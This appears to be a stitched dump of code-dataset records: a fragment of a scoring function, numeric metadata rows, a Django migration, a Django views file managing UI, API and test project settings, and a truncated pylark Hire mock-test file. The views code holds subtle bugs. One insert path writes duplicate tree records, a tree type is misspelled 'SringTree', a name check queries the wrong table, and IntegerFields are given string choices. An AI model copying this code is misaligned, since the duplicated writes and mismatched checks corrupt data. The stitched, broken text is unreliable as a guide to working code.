score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_e = self.e.get_score(color, board, possibility_b, possibility_w)
score_b = self.b.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p + score_e + score_b
| 32.957407
| 188
| 0.638872
| 2,296
| 17,797
| 4.750871
| 0.06838
| 0.077008
| 0.161716
| 0.169417
| 0.805281
| 0.777778
| 0.740466
| 0.721672
| 0.721672
| 0.718097
| 0
| 0.035812
| 0.243749
| 17,797
| 539
| 189
| 33.018553
| 0.774649
| 0.13536
| 0
| 0.664
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212
| false
| 0
| 0.012
| 0.012
| 0.492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
58b4369fd43b6a0e93087765957edc575e02e7d1
| 2,571
|
py
|
Python
|
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-03-14 17:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('MatchApp', '0009_auto_20210314_1745'),
]
operations = [
migrations.AlterField(
model_name='personalidad_perro',
name='carinoso',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='curioso',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='deportista',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='educado',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='independiente',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='jugueton',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
migrations.AlterField(
model_name='personalidad_perro',
name='tranquilo',
field=models.IntegerField(blank=True, choices=[('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default=0, null=True),
),
]
| 52.469388
| 216
| 0.440685
| 309
| 2,571
| 3.61165
| 0.171521
| 0.125448
| 0.15681
| 0.1819
| 0.80914
| 0.80914
| 0.80914
| 0.764337
| 0.764337
| 0.764337
| 0
| 0.105641
| 0.24154
| 2,571
| 48
| 217
| 53.5625
| 0.466667
| 0.017503
| 0
| 0.666667
| 1
| 0
| 0.153328
| 0.009113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
58d4a3d81149e5f3c585e2c8ec3265a6ca1458ac
| 21,016
|
py
|
Python
|
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | null | null | null |
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | 2
|
2020-06-06T00:51:32.000Z
|
2021-06-10T22:40:50.000Z
|
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | 1
|
2020-05-31T03:49:24.000Z
|
2020-05-31T03:49:24.000Z
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.template import loader
import json
import logging
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db.models import Max
from django.db import transaction
from website.models import UI_project_setting
from website.models import API_project_setting
from website.models import Test_project_setting
from website.models import Project_chosen
from website.models import Page_tree
from website.models import UI_case_tree
from website.models import API_case_tree
from website.models import Sprint_tree
from website.models import Database_setting
from website.models import UI_test_plan
from website.models import API_test_plan
from website.models import Running_plan
logger = logging.getLogger('mylogger')
# 项目管理-UI项目配置
def ui_project_setting(request):
template = loader.get_template('website/pages/UIProjectSetting.html')
return HttpResponse(template.render({}, request))
# 项目管理-API项目配置
def api_project_setting(request):
template = loader.get_template('website/pages/APIProjectSetting.html')
return HttpResponse(template.render({}, request))
# 项目管理-测试项目配置
def test_project_setting(request):
template = loader.get_template('website/pages/TestProjectSetting.html')
return HttpResponse(template.render({}, request))
# 获取列表数据
def get_ui_project_settings(request):
griddata = {"total": 0, "rows": []}
rows = [] # 用于存储记录行
try:
# 获取总记录数
records = UI_project_setting.objects.all().order_by('-order').values()
griddata["total"] = len(records)
page_num = request.GET.get('page') # 记录请求的是第几页数据
rows_num = request.GET.get('rows') # 记录请求每页的记录数
paginator = Paginator(records, rows_num) # 设置每页展示的数据
try:
page = paginator.page(page_num)
except PageNotAnInteger as e: # 如果请求的页面编号不存在,返回第一页数据
logger.warn('%s' % e)
page = paginator.page(1)
except EmptyPage as e: # 如果请求页面,超出页面范围,返回最后一页数据
logger.warn('%s' % e)
page = paginator.page(paginator.num_pages)
objs = page.object_list
for obj in objs:
rows.append(obj)
griddata["rows"] = rows
griddata = json.dumps(griddata)
return HttpResponse(griddata)
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 获取列表数据
def get_api_project_settings(request):
griddata = {"total": 0, "rows": []}
rows = [] # 用于存储记录行
try:
# 获取总记录数
records = API_project_setting.objects.all().order_by('-order').values()
griddata["total"] = len(records)
page_num = request.GET.get('page') # 记录请求的是第几页数据
rows_num = request.GET.get('rows') # 记录请求每页的记录数
paginator = Paginator(records, rows_num) # 设置每页展示的数据
try:
page = paginator.page(page_num)
except PageNotAnInteger as e: # 如果请求的页面编号不存在,返回第一页数据
logger.warn('%s' % e)
page = paginator.page(1)
except EmptyPage as e: # 如果请求页面,超出页面范围,返回最后一页数据
logger.warn('%s' % e)
page = paginator.page(paginator.num_pages)
objs = page.object_list
for obj in objs:
rows.append(obj)
griddata["rows"] = rows
griddata = json.dumps(griddata)
return HttpResponse(griddata)
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 获取列表数据
def get_test_project_settings(request):
griddata = {"total": 0, "rows": []}
rows = [] # 用于存储记录行
try:
# 获取总记录数
records = Test_project_setting.objects.all().order_by('-order').values()
griddata["total"] = len(records)
page_num = request.GET.get('page') # 记录请求的是第几页数据
rows_num = request.GET.get('rows') # 记录请求每页的记录数
paginator = Paginator(records, rows_num) # 设置每页展示的数据
try:
page = paginator.page(page_num)
except PageNotAnInteger as e: # 如果请求的页面编号不存在,返回第一页数据
logger.warn('%s' % e)
page = paginator.page(1)
except EmptyPage as e: # 如果请求页面,超出页面范围,返回最后一页数据
logger.warn('%s' % e)
page = paginator.page(paginator.num_pages)
objs = page.object_list
for obj in objs:
rows.append(obj)
griddata["rows"] = rows
griddata = json.dumps(griddata)
return HttpResponse(griddata)
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 新增
def add_ui_project_setting(request):
try:
params = request.POST
project_name = params['project_name']
home_page = params['home_page']
environment = params['environment']
environment_id = params['environment_id']
valid_flag = params['valid_flag']
order = params['order']
if not project_name:
return HttpResponse('项目名称不能为空')
elif UI_project_setting.objects.filter(project_name=project_name).exists():
# logger.error('error, 项目名称(%s)已存在' % project_name)
return HttpResponse('项目名称(%s)已存在' % project_name)
if not home_page:
return HttpResponse('项目主页不能为空')
if not environment:
return HttpResponse('所属环境不能为空')
if not valid_flag:
return HttpResponse('是否启用不能为空')
if order == '': # 如果顺序为空,表明是新增
all_objects = UI_project_setting.objects.all()
if all_objects.exists():
max_order = all_objects.aggregate(Max('order'))['order__max']
order = max_order + 1
else:
order = 1
obj = UI_project_setting(project_name=project_name, home_page=home_page, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
obj.save()
else: #表明是插入
# logger.info('即将插入新记录,正在调整记录的顺序') # 插入记录所在行上方的记录都+1
try:
with transaction.atomic():
all_objects = UI_project_setting.objects.filter(order__gte=order)
for item in all_objects:
item.order = item.order + 1
item.save()
obj = UI_project_setting(project_name=project_name, home_page=home_page, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
obj.save()
project_id = UI_project_setting.objects.filter(project_name=project_name).values()[0]['id']
# 往UI页面树数据表中写一条记录,即对应根目录
obj = Page_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 往UI用例树数据表中写一条记录,即对应根目录
obj = UI_case_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 页面树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='PageTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='PageTree', project_id=project_id)
obj.save()
# 用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='UICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='UICaseTree', project_id=project_id)
obj.save()
# UI测试计划管理-用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='PlanUICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='PlanUICaseTree', project_id=project_id)
obj.save()
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
project_id = UI_project_setting.objects.filter(project_name=project_name).values()[0]['id']
# 往UI页面树数据表中写一条记录,即对应根目录
obj = Page_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 往UI用例树数据表中写一条记录,即对应根目录
obj = UI_case_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 页面树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='PageTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='PageTree', project_id=project_id)
obj.save()
# 用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='UICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='UICaseTree', project_id=project_id)
obj.save()
# UI测试计划管理-用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='PlanUICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='PlanUICaseTree', project_id=project_id)
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 新增
def add_api_project_setting(request):
try:
params = request.POST
project_name = params['project_name']
protocol = params['protocol'].strip().lower()
host = params['host'].strip()
port = params['port'].strip()
environment = params['environment']
environment_id = params['environment_id']
valid_flag = params['valid_flag']
order = params['order']
if not project_name:
return HttpResponse('项目名称不能为空')
elif API_project_setting.objects.filter(project_name=project_name).exists():
return HttpResponse('项目名称(%s)已存在' % project_name)
if protocol == '':
return HttpResponse('接口请求协议不能为空')
elif protocol !='' and protocol not in ('https', 'http'):
return HttpResponse('协议只能是http、https')
if not host:
return HttpResponse('主机地址不能为空')
if not environment:
return HttpResponse('所属环境不能为空')
if not valid_flag:
return HttpResponse('是否启用不能为空')
if protocol == 'http' and port == '':
port = 80 # http请求,默认为80
elif protocol != 'http' and port == '':
return HttpResponse('非http协议,端口不能为空')
elif not port.isdigit():
return HttpResponse('端口只能为数字')
if order == '': # 如果顺序为空,表明是新增
all_objects = API_project_setting.objects.all()
if all_objects.exists():
max_order = all_objects.aggregate(Max('order'))['order__max']
order = max_order + 1
else:
order = 1
obj = API_project_setting(project_name=project_name, protocol=protocol, host=host, port=port, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
obj.save()
else: #表明是插入
# logger.info('即将插入新记录,正在调整记录的顺序') # 插入记录所在行上方的记录都+1
try:
with transaction.atomic():
all_objects = API_project_setting.objects.filter(order__gte=order)
for item in all_objects:
item.order = item.order + 1
item.save()
obj = API_project_setting(project_name=project_name, protocol=protocol, host=host, port=port, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
obj.save()
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
project_id = API_project_setting.objects.filter(project_name=project_name).values()[0]['id']
# 往API用例树数据表中写一条记录,即对应根目录
obj = API_case_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='APICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='APICaseTree', project_id=project_id)
obj.save()
# API测试计划管理-用例树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='PlanAPICaseTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='PlanAPICaseTree', project_id=project_id)
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 新增
def add_test_project_setting(request):
try:
params = request.POST
project_name = params['project_name']
valid_flag = params['valid_flag']
order = params['order']
if not project_name:
return HttpResponse('项目名称不能为空')
elif Test_project_setting.objects.filter(project_name=project_name).exists():
return HttpResponse('项目名称(%s)已存在' % project_name)
if not valid_flag:
return HttpResponse('是否启用不能为空')
if order == '': # 如果顺序为空,表明是新增
all_objects = Test_project_setting.objects.all()
if all_objects.exists():
max_order = all_objects.aggregate(Max('order'))['order__max']
order = max_order + 1
else:
order = 1
obj = Test_project_setting(project_name=project_name, valid_flag=valid_flag, order=order)
obj.save()
else: #表明是插入
# logger.info('即将插入新记录,正在调整记录的顺序') # 插入记录所在行上方的记录都+1
try:
with transaction.atomic():
all_objects = Test_project_setting.objects.filter(order__gte=order)
for item in all_objects:
item.order = item.order + 1
item.save()
obj = Test_project_setting(project_name=project_name, valid_flag=valid_flag, order=order)
obj.save()
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
project_id = Test_project_setting.objects.filter(project_name=project_name).values()[0]['id']
# 往版本迭代树数据表中写一条记录,即对应根目录
obj = Sprint_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
obj.save()
# 迭代树还没选择默认的项目,插入默认项目
if not Project_chosen.objects.filter(tree_type='SprintTree').exists():
obj = Project_chosen(project_name=project_name, tree_type='SringTree', project_id=project_id)
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 编辑
def edit_ui_project_setting(request):
try:
params = request.POST
id = params['id']
project_name = params['project_name']
home_page = params['home_page']
environment = params['environment']
environment_id = params['environment_id']
valid_flag = params['valid_flag']
if not project_name:
return HttpResponse('项目名称不能为空')
elif UI_project_setting.objects.filter(project_name=project_name).exclude(id=id).exists():
# logger.error('error, 项目名称(%s)已存在' % project_name)
return HttpResponse('项目名称(%s)已存在' % project_name)
if not home_page:
return HttpResponse('项目主页不能为空')
if not environment:
return HttpResponse('所属环境不能为空')
if not valid_flag:
return HttpResponse('是否启用不能为空')
obj = UI_project_setting.objects.get(id=id)
obj.project_name = project_name
obj.home_page = home_page
obj.environment = environment
obj.environment_id = environment_id
obj.valid_flag = valid_flag
obj.save()
# logger.info('同步更新数据库配置表')
obj_list = Database_setting.objects.filter(project_type='UI项目').filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新UI测试计划表')
obj_list = UI_test_plan.objects.filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新运行计划表')
obj_list = Running_plan.objects.filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新当前所选项目表')
obj_list = Project_chosen.objects.filter(project_id=id).exclude(tree_type='SprintTree').exclude(tree_type='APICaseTree').exclude(tree_type='PlanAPICaseTree')
for obj in obj_list:
obj.project_name = project_name
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 编辑
def edit_api_project_setting(request):
try:
params = request.POST
id = params['id']
project_name = params['project_name']
protocol = params['protocol'].strip().lower()
host = params['host'].strip()
port = params['port'].strip()
environment = params['environment']
environment_id = params['environment_id']
valid_flag = params['valid_flag']
if not project_name:
return HttpResponse('项目名称不能为空')
elif API_project_setting.objects.filter(project_name=project_name).exclude(id=id).exists():
return HttpResponse('项目名称(%s)已存在' % project_name)
if not protocol:
return HttpResponse('接口请求协议不能为空')
elif protocol not in ('https', 'http'):
return HttpResponse('协议只能是http、https')
if not host:
return HttpResponse('主机地址不能为空')
if not environment:
return HttpResponse('所属环境不能为空')
if not valid_flag:
return HttpResponse('是否启用不能为空')
if protocol == 'http' and port == '':
port = 80 # http请求,默认为80
elif protocol != 'http' and port == '':
return HttpResponse('非http协议,端口不能为空')
elif not port.isdigit():
return HttpResponse('端口只能为数字')
obj = API_project_setting.objects.get(id=id)
obj.project_name = project_name
obj.protocol = protocol
obj.host = host
obj.port = port
obj.environment = environment
obj.environment_id = environment_id
obj.valid_flag = valid_flag
obj.save()
# logger.info('同步更新数据库配置表')
obj_list = Database_setting.objects.filter(project_type='API项目').filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新API测试计划表')
obj_list = API_test_plan.objects.filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新运行计划表')
obj_list = Running_plan.objects.filter(project_id=id)
for obj in obj_list:
obj.project_name = project_name
obj.save()
# logger.info('同步更新当前所选项目表')
obj_list = Project_chosen.objects.filter(project_id=id).exclude(tree_type='SprintTree').exclude(tree_type='UICaseTree').exclude(tree_type='PlanUICaseTree').exclude(tree_type='PageTree')
for obj in obj_list:
obj.project_name = project_name
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
# 编辑
def edit_test_project_setting(request):
try:
params = request.POST
id = params['id']
project_name = params['project_name']
valid_flag = params['valid_flag']
if not project_name:
return HttpResponse('项目名称不能为空')
elif API_project_setting.objects.filter(project_name=project_name).exclude(id=id).exists():
return HttpResponse('项目名称(%s)已存在' % project_name)
if not valid_flag:
return HttpResponse('是否启用不能为空')
obj = Test_project_setting.objects.get(id=id)
obj.project_name = project_name
obj.valid_flag = valid_flag
obj.save()
# logger.info('同步更新当前所选项目表')
obj_list = Project_chosen.objects.filter(project_id=id).exclude(tree_type='PlanAPICaseTree').exclude(tree_type='APICaseTree').exclude(tree_type='UICaseTree').exclude(tree_type='PlanUICaseTree').exclude(tree_type='PageTree')
for obj in obj_list:
obj.project_name = project_name
obj.save()
return HttpResponse('success')
except Exception as e:
logger.error('%s' % e)
return HttpResponse('%s' % e)
| 38.420475
| 231
| 0.618291
| 2,381
| 21,016
| 5.257455
| 0.076438
| 0.093146
| 0.053203
| 0.065026
| 0.938808
| 0.928343
| 0.893433
| 0.88177
| 0.879853
| 0.860042
| 0
| 0.002753
| 0.273982
| 21,016
| 547
| 232
| 38.420475
| 0.817669
| 0.061382
| 0
| 0.815789
| 0
| 0
| 0.070731
| 0.005496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028708
| false
| 0
| 0.047847
| 0
| 0.215311
| 0.011962
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45029268107518c70d9399a91385aabcbfa18bad
| 34,221
|
py
|
Python
|
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 7
|
2021-08-18T00:42:05.000Z
|
2022-03-14T09:49:15.000Z
|
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | null | null | null |
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 1
|
2022-03-14T09:49:20.000Z
|
2022-03-14T09:49:20.000Z
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
import unittest
import pylark
import pytest
from tests.test_conf import app_all_permission, app_no_permission
from tests.test_helper import mock_get_tenant_access_token_failed
def mock(*args, **kwargs):
raise pylark.PyLarkError(scope="scope", func="func", code=1, msg="mock-failed")
def mock_raw_request(*args, **kwargs):
raise pylark.PyLarkError(
scope="scope", func="func", code=1, msg="mock-raw-request-failed"
)
# mock get token
class TestHireSampleMockGetTokenFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestHireSampleMockGetTokenFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.cli.auth.get_tenant_access_token = mock_get_tenant_access_token_failed
self.cli.auth.get_app_access_token = mock_get_tenant_access_token_failed
self.module_cli = self.cli.hire
def test_mock_get_token_get_hire_job(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job(pylark.GetHireJobReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_job_manager(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_manager(pylark.GetHireJobManagerReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_talent(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_talent(pylark.GetHireTalentReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_attachment(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment(pylark.GetHireAttachmentReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_attachment_preview(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment_preview(
pylark.GetHireAttachmentPreviewReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_resume_source(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_note(pylark.UpdateHireNoteReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note(pylark.GetHireNoteReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_note_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_referral_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_referral_by_application(
pylark.GetHireReferralByApplicationReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_job_process_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_terminate_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.terminate_hire_application(
pylark.TerminateHireApplicationReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application(pylark.GetHireApplicationReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_application_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_list(
pylark.GetHireApplicationListReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_application_interview_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_interview_list(
pylark.GetHireApplicationInterviewListReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_offer_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_by_application(
pylark.GetHireOfferByApplicationReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_offer_schema(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_schema(pylark.GetHireOfferSchemaReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_make_hire_transfer_onboard_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.make_hire_transfer_onboard_by_application(
pylark.MakeHireTransferOnboardByApplicationReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_employee(pylark.UpdateHireEmployeeReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_employee_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee_by_application(
pylark.GetHireEmployeeByApplicationReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee(pylark.GetHireEmployeeReq())
assert "msg=failed" in f"{e}"
# mock mock self func
class TestHireSampleMockSelfFuncFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestHireSampleMockSelfFuncFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.hire
def test_mock_self_func_get_hire_job(self):
origin_func = self.module_cli.get_hire_job
self.module_cli.get_hire_job = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job(pylark.GetHireJobReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job = origin_func
def test_mock_self_func_get_hire_job_manager(self):
origin_func = self.module_cli.get_hire_job_manager
self.module_cli.get_hire_job_manager = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_manager(pylark.GetHireJobManagerReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job_manager = origin_func
def test_mock_self_func_get_hire_talent(self):
origin_func = self.module_cli.get_hire_talent
self.module_cli.get_hire_talent = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_talent(pylark.GetHireTalentReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_talent = origin_func
def test_mock_self_func_get_hire_attachment(self):
origin_func = self.module_cli.get_hire_attachment
self.module_cli.get_hire_attachment = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment(pylark.GetHireAttachmentReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_attachment = origin_func
def test_mock_self_func_get_hire_attachment_preview(self):
origin_func = self.module_cli.get_hire_attachment_preview
self.module_cli.get_hire_attachment_preview = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment_preview(
pylark.GetHireAttachmentPreviewReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_attachment_preview = origin_func
def test_mock_self_func_get_hire_resume_source(self):
origin_func = self.module_cli.get_hire_resume_source
self.module_cli.get_hire_resume_source = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_resume_source = origin_func
def test_mock_self_func_create_hire_note(self):
origin_func = self.module_cli.create_hire_note
self.module_cli.create_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_hire_note = origin_func
